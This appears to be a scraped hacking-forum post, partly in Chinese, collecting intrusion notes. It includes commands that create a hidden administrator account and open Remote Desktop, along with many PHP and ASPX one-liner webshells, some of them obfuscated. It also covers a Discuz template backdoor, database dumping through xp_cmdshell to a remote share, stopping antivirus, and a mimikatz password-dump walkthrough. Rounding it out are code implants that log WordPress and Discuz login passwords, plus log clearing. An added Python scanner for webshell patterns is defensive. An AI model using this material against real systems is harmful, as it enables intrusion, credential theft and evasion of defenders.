3 Y5 h% o. c0 K0 n6 c; l7 u! P2 i ] G. \( h3 a
Script for logging 3389 remote logins
Save it as a bat file
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
      [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.
/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created with Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to a separate logon to the computer. In other words, with the console parameter you get the desktop shown on the monitor. Try it; it comes in handy at times, especially with some software that
mstsc /console /v:124.42.126.xxx   gets around the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2   view user accounts and passwords
Export the Access database directly as a shell; prerequisites: table a exists in the Access database and you know the site's real path
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. In manual MSSQL injection, when you cannot write the data out through a reverse connection, you mostly end up reading records one at a time, which is tiring. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // SYSTEM privileges are needed; use at or psexec -s cmd.exe
Files of type .com, e.g. nc.com, can be uploaded to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from a DOS prompt

exec master..xp_cmdshell 'net user'
Executing a command in MSSQL.
Query that returns the MSSQL password hashes
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Shrinking an MSSQL database

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses the file game_db_201107170400.BAK into 1.rar, split into 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at D:\WebSites\game.com\UpFileList\game.bak

+ F: j- b' m) e8 b- S" d' g8 _Discuz!nt35渗透要点:
2 c! f6 H4 p$ Q; K(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default& a% A& z9 |$ Z/ w* A
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
& g( k* S5 @& i( b# a( y(3)保存。3 `6 ]- H$ q% m5 `2 M
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
3 o5 ^5 s* R3 `: \ ^6 Pd:\rar.exe a -r d:\1.rar d:\website\* h1 D5 V. P, h" q( u
递归压缩website q1 S+ |" p& O% c% N! E
注意rar.exe的路径9 i; T- g8 H# Z0 A0 x
) o. H$ q" E N/ O: r) E9 g Q
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: unfiltered input allowed a one-liner trojan to be inserted into this config file.

Tips for dumping the database when the web server and the database server are separated:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Constraints prevented writing a full shell; only a one-liner was available, which is actually enough to do anything, just not intuitive or convenient, for example dumping the database.
What is used here is the shell client's expert mode (write the code yourself).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint collects operating-system fingerprints.
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identifies the name servers and obtains DNS information
host -l www.owasp.org ns1.secure.net    attempts a zone transfer for owasp.org

Netcraft DNS search service: http://searchdns.netcraft.com/?host

Domain Tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com    syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/    syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)

set names gb2312
Importing the database gave the error "Data too long for column 'username' at row 1". The cause is that Chinese is not supported; run set names gb2312 first.

MySQL password change:
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans were found during intrusions. They are recorded here so that they can later be searched for and removed by keyword.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Chopper (caidao) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// Dangerous include function: compiles any file as PHP and runs it

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// Renames (copies) any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Chopper (caidao) one-liner

5. include ($uid);
// Dangerous include function: compiles any file as PHP and runs it, fed via POST

// One-liner embedded in a GIF

6. Typical one-liners
Backdoor code:
<?php eval_r($_POST[sb])?>
Code:
<?php @eval_r($_POST[sb])?>
// fault-tolerant version
Code:
<?php assert($_POST[sb]);?>
// executes PHP statements through the expert mode of the lanker one-liner client
Code:
<?$_POST['sa']($_POST['sb']);?>
Code:
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code:
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after using this one, enter the following in the "Config" field when setting up the connection in the Chopper client
Code:
<O>h=@eval_r($_POST[c]);</O>
Code:
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a restriction on <?
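As an added example that is not part of the original post, this Python scanner looks for the one-liner patterns catalogued above and in the $telok config snippet earlier (function names assembled from one-character strings and then called, preg_replace with /e, eval/assert on request data, variable functions taken from superglobals, include of a request-controlled variable, and the <script language="php"> tag); the rule names, regexes and the sample file are my own constructions.

```python
import re

# Added example, not from the original post; rules and sample are constructed.
SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)"
DANGEROUS = {"eval", "assert", "preg_replace", "copy", "system", "exec", "passthru"}
# One regex per pattern seen in the catalogue; each is checked line by line.
RULES = [
    ("eval/assert on request data",
     re.compile(r"\b(?:eval|assert)\s*\(\s*" + SUPERGLOBAL)),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*[\"'][^\"']*/e[\"']")),
    ("variable function taken from request data",
     re.compile(SUPERGLOBAL + r"\s*\[[^\]]*\]\s*\(")),
    ("include/require of request data",
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*" + SUPERGLOBAL)),
    ('PHP code inside <script language="php">',
     re.compile(r"<script\s+language\s*=\s*[\"']php[\"']", re.I)),
]
# $hh = "p"."r"."e"."g"...: a function name assembled from one-char strings.
CONCAT = re.compile(r'(\$\w+)\s*=\s*((?:"[a-z_]"\s*\.\s*){2,}"[a-z_]")')
ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + SUPERGLOBAL)
INCLUDE_VAR = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*(\$\w+)")

def scan_php(source):
    """Return [(line_no, finding), ...] for backdoor patterns in PHP source."""
    findings = []
    assembled = {}   # $var -> dangerous function name built by concatenation
    tainted = set()  # $var assigned straight from a request superglobal
    for no, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((no, name))
        m = CONCAT.search(line)
        if m:
            fname = "".join(re.findall(r'"([a-z_])"', m.group(2)))
            if fname in DANGEROUS:
                assembled[m.group(1)] = fname
                findings.append((no, "function name assembled from chars: " + fname))
        for var, fname in assembled.items():
            if re.search(re.escape(var) + r"\s*\(", line):
                findings.append((no, "call through assembled name: " + fname))
        m = ASSIGN.search(line)
        if m:
            tainted.add(m.group(1))
        m = INCLUDE_VAR.search(line)
        if m and m.group(1) in tainted:
            findings.append((no, "include of request-controlled variable " + m.group(1)))
    return findings

# Constructed sample mirroring the patterns listed on this page (not a real file).
SAMPLE = r'''<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
$filename=$_GET['xbid'];
include ($filename);
$telok = "0${@eval($_POST[xxoo])}";
$_POST['sa']($_POST['sb']);
@preg_replace("/[email]/e",$_POST['h'],"error");
<script language="php">@eval($_POST[sb])</script>
'''
```

Running scan_php(SAMPLE) reports eight findings, one per line of the sample except the opening tag, with line 9 flagged twice.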

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory: psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Type exit to quit; do not close the window directly, or the system will crash.

http://www.monyer.com/demo/monyerjs/    fairly complete JS decoding site

Automatically check for critical system patches:
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-liner ASPX backdoor that gets past Safedog:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell makes further social engineering easier.
In wp-login.php, add at line 539:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login, the password-logging code is triggered; of course, you can also put this code in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly below; the recorded passwords are written to pwd.txt.
Actually, modifying wp-login.php is not a good approach; it is easy to discover. There are other methods; noting this for the record.
Bypassing Safedog using the IIS 6 file parsing vulnerability:
;antian365.asp;antian365.jpg

Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack the case sensitive hash in cain; try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql"):
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....

Enabling xp_cmdshell in SQL Server 2005/2008:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL Server 2008 log clearing; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
clear the corresponding entries in the registry under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.
This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
Step 1: First check whether the right-click menu already has "Take ownership as administrator". If it does not:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the above as a .reg file to add the Win7 right-click "Take ownership as administrator" entry.
Step 2: Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" files and four "notepad.exe.mui" files.
1. The "notepad.exe" under C:\Windows does not need to be replaced
2. The "notepad.exe" under C:\Windows\System32 does not need to be replaced
3. Leave the four "notepad.exe.mui" files alone
4. Mainly replace the "notepad.exe" under the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take ownership of these two folders as administrator, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders.
After replacing, go back to the desktop, create a new .txt document and open it to see whether it has changed.
Disabling the security policy (UAC) on Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: after the line
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically in the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; password: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);